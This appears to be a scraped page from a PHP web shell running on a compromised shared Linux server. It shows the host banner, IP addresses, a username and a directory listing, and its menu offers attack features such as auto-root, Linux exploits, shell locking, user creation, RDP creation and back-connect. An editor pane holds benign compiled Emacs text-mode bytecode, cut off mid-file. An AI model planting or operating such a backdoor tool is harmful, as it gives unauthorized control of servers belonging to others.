Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
27.1 /
lisp /
textmodes /
[ HOME SHELL ]
Name
Size
Permission
Action
artist.elc
159.15
KB
-rw-r--r--
bib-mode.elc
7.46
KB
-rw-r--r--
bibtex-style.elc
5.21
KB
-rw-r--r--
bibtex.elc
179.15
KB
-rw-r--r--
conf-mode.elc
38.64
KB
-rw-r--r--
css-mode.elc
62.47
KB
-rw-r--r--
dns-mode.elc
11.78
KB
-rw-r--r--
enriched.elc
15.22
KB
-rw-r--r--
fill.elc
35.71
KB
-rw-r--r--
flyspell.elc
53.93
KB
-rw-r--r--
ispell.elc
111.41
KB
-rw-r--r--
less-css-mode.elc
7.71
KB
-rw-r--r--
makeinfo.elc
6.02
KB
-rw-r--r--
mhtml-mode.elc
22.88
KB
-rw-r--r--
nroff-mode.elc
11.01
KB
-rw-r--r--
page-ext.elc
19.02
KB
-rw-r--r--
page.elc
3.57
KB
-rw-r--r--
paragraphs.elc
16.25
KB
-rw-r--r--
picture.elc
27.28
KB
-rw-r--r--
po.elc
2.64
KB
-rw-r--r--
refbib.elc
17.77
KB
-rw-r--r--
refer.elc
8.84
KB
-rw-r--r--
refill.elc
6.28
KB
-rw-r--r--
reftex-auc.elc
5.79
KB
-rw-r--r--
reftex-cite.elc
31.56
KB
-rw-r--r--
reftex-dcr.elc
11.79
KB
-rw-r--r--
reftex-global.elc
12.13
KB
-rw-r--r--
reftex-index.elc
65.86
KB
-rw-r--r--
reftex-loaddefs.el
23.92
KB
-rw-r--r--
reftex-parse.elc
25.85
KB
-rw-r--r--
reftex-ref.elc
19.53
KB
-rw-r--r--
reftex-sel.elc
21.71
KB
-rw-r--r--
reftex-toc.elc
33.69
KB
-rw-r--r--
reftex-vars.elc
80.41
KB
-rw-r--r--
reftex.elc
54.25
KB
-rw-r--r--
remember.elc
18.65
KB
-rw-r--r--
rst.elc
135.86
KB
-rw-r--r--
sgml-mode.elc
99.95
KB
-rw-r--r--
table.elc
155.49
KB
-rw-r--r--
tex-mode.elc
108.71
KB
-rw-r--r--
texinfmt.elc
83.49
KB
-rw-r--r--
texinfo.elc
46.85
KB
-rw-r--r--
texnfo-upd.elc
47.89
KB
-rw-r--r--
text-mode.elc
10.77
KB
-rw-r--r--
tildify.elc
17.44
KB
-rw-r--r--
two-column.elc
12.41
KB
-rw-r--r--
underline.elc
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : text-mode.elc
;ELC ;;; Compiled ;;; in Emacs version 27.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. ;;; This file does not contain utf-8 non-ASCII characters, ;;; and so can be loaded in Emacs versions earlier than 23. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301\302\303\304DD\305\306\307\310\311\312\313& \207" [custom-declare-variable text-mode-hook funcall function #[0 "\300\207" [(text-mode-hook-identify)] 1] "Normal hook run when entering Text mode and many related modes." :type hook :options (turn-on-auto-fill turn-on-flyspell) :group text] 10) #@64 Non-nil if this buffer's major mode is a variant of Text mode. (defvar text-mode-variant nil (#$ . 721)) (make-obsolete-variable 'text-mode-variant 'derived-mode-p "27.1") #@41 Syntax table used while in `text-mode'. (defvar text-mode-syntax-table (byte-code "\300 \301\302\303#\210\301\304\303#\210\301\305\306#\210\301\307\310\"\210\301\311\310\"\210\301\312\310\"\210\301\313\310\"\210\301\314\310\"\210\211\207" [make-syntax-table modify-syntax-entry 34 ". " 92 39 "w p" 1523 "w " 1524 183 8231 65306] 5) (#$ . 899)) #@151 Keymap for `text-mode'. Many other modes, such as `mail-mode', `outline-mode' and `indented-text-mode', inherit all the commands defined in this map. (defvar text-mode-map (byte-code "\301 \302\303\304#\210\302\305\306\301\306!B#\210\307\310\311#\210\307\312\313#\210\307\314#\210\307\315\316#\210\307\317\320#\210\307\321\322#\210\211\207" [menu-bar-separator make-sparse-keymap define-key " " ispell-complete-word [menu-bar text] "Text" bindings--define-key [menu-bar text toggle-text-mode-auto-fill] (menu-item "Auto Fill" toggle-text-mode-auto-fill :button (:toggle memq 'turn-on-auto-fill text-mode-hook) :help "Automatically fill text while typing in text modes (Auto Fill mode)") [menu-bar text paragraph-indent-minor-mode] (menu-item "Paragraph Indent" paragraph-indent-minor-mode :button (:toggle bound-and-true-p paragraph-indent-minor-mode) :help "Toggle paragraph indent minor mode") [menu-bar text sep] [menu-bar text center-region] (menu-item "Center Region" center-region :help "Center the marked region" :enable (region-active-p)) [menu-bar text center-paragraph] (menu-item "Center Paragraph" center-paragraph :help "Center the current paragraph") [menu-bar text center-line] (menu-item "Center Line" center-line :help "Center the current line")] 7) (#$ . 1257)) (defvar text-mode-hook nil) (byte-code "\300\301N\204\f \302\300\301\303#\210\304\305!\204 \302\305\306\307#\210\300\207" [text-mode-hook variable-documentation put "Hook run after entering Text mode.\nNo problems result if this variable is not bound.\n`add-hook' automatically binds it. (This is true for all hook variables.)" boundp text-mode-map definition-name text-mode] 4) (defvar text-mode-map (make-sparse-keymap)) (byte-code "\301\302N\204 \303\301\302\304\305!#\210\306\307!\204 \303\307\310\311#\210\312\313 !\210\307\302N\204- \303\307\302\304\314!#\210\306\300!\204B \303\300\310\311#\210\315\316\300\317\"\210!\210\300\302N\204P \303\300\302\304\320!#\210\303\311\321\317#\207" [text-mode-abbrev-table text-mode-map variable-documentation put purecopy "Keymap for `text-mode'." boundp text-mode-syntax-table definition-name text-mode (lambda (#1=#:def-tmp-var) (defvar text-mode-syntax-table #1#)) make-syntax-table "Syntax table for `text-mode'." (lambda (#1#) (defvar text-mode-abbrev-table #1#)) define-abbrev-table nil "Abbrev table for `text-mode'." derived-mode-parent] 5) #@299 Major mode for editing text written for humans to read. In this mode, paragraphs are delimited only by blank or white lines. You can thus get the full benefit of adaptive filling (see the variable `adaptive-fill-mode'). \{text-mode-map} Turning on Text mode runs the normal hook `text-mode-hook'. (defalias 'text-mode #[0 "\306\300!\210\307\310 \210\311\312\313!\210\314\f!\210 \306\315!\210\307 \306\316!\210)\317\320!\207" [delay-mode-hooks major-mode mode-name text-mode-map text-mode-syntax-table text-mode-abbrev-table make-local-variable t kill-all-local-variables text-mode "Text" use-local-map set-syntax-table text-mode-variant require-final-newline run-mode-hooks text-mode-hook local-abbrev-table mode-require-final-newline] 2 (#$ . 3652) nil]) (defvar paragraph-indent-text-mode-hook nil) (byte-code "\300\301N\204\f \302\300\301\303#\210\304\305!\204 \302\305\306\307#\210\300\207" [paragraph-indent-text-mode-hook variable-documentation put "Hook run after entering Parindent mode.\nNo problems result if this variable is not bound.\n`add-hook' automatically binds it. (This is true for all hook variables.)" boundp paragraph-indent-text-mode-map definition-name paragraph-indent-text-mode] 4) (defvar paragraph-indent-text-mode-map (make-sparse-keymap)) (byte-code "\300\301N\204 \302\300\301\303\304!#\210\302\305\306\307#\207" [paragraph-indent-text-mode-map variable-documentation put purecopy "Keymap for `paragraph-indent-text-mode'." paragraph-indent-text-mode derived-mode-parent text-mode] 5) #@430 Major mode for editing text, with leading spaces starting a paragraph. In this mode, you do not need blank lines between paragraphs when the first line of the following paragraph starts with whitespace. `paragraph-indent-minor-mode' provides a similar facility as a minor mode. Special commands: \{text-mode-map} Turning on Paragraph-Indent Text mode runs the normal hooks `text-mode-hook' and `paragraph-indent-text-mode-hook'. (defalias 'paragraph-indent-text-mode #[0 "\304\300!\210\305\306 \210\307\310\306\311N\203 \312\307\311\306\311N#\210\313!\204'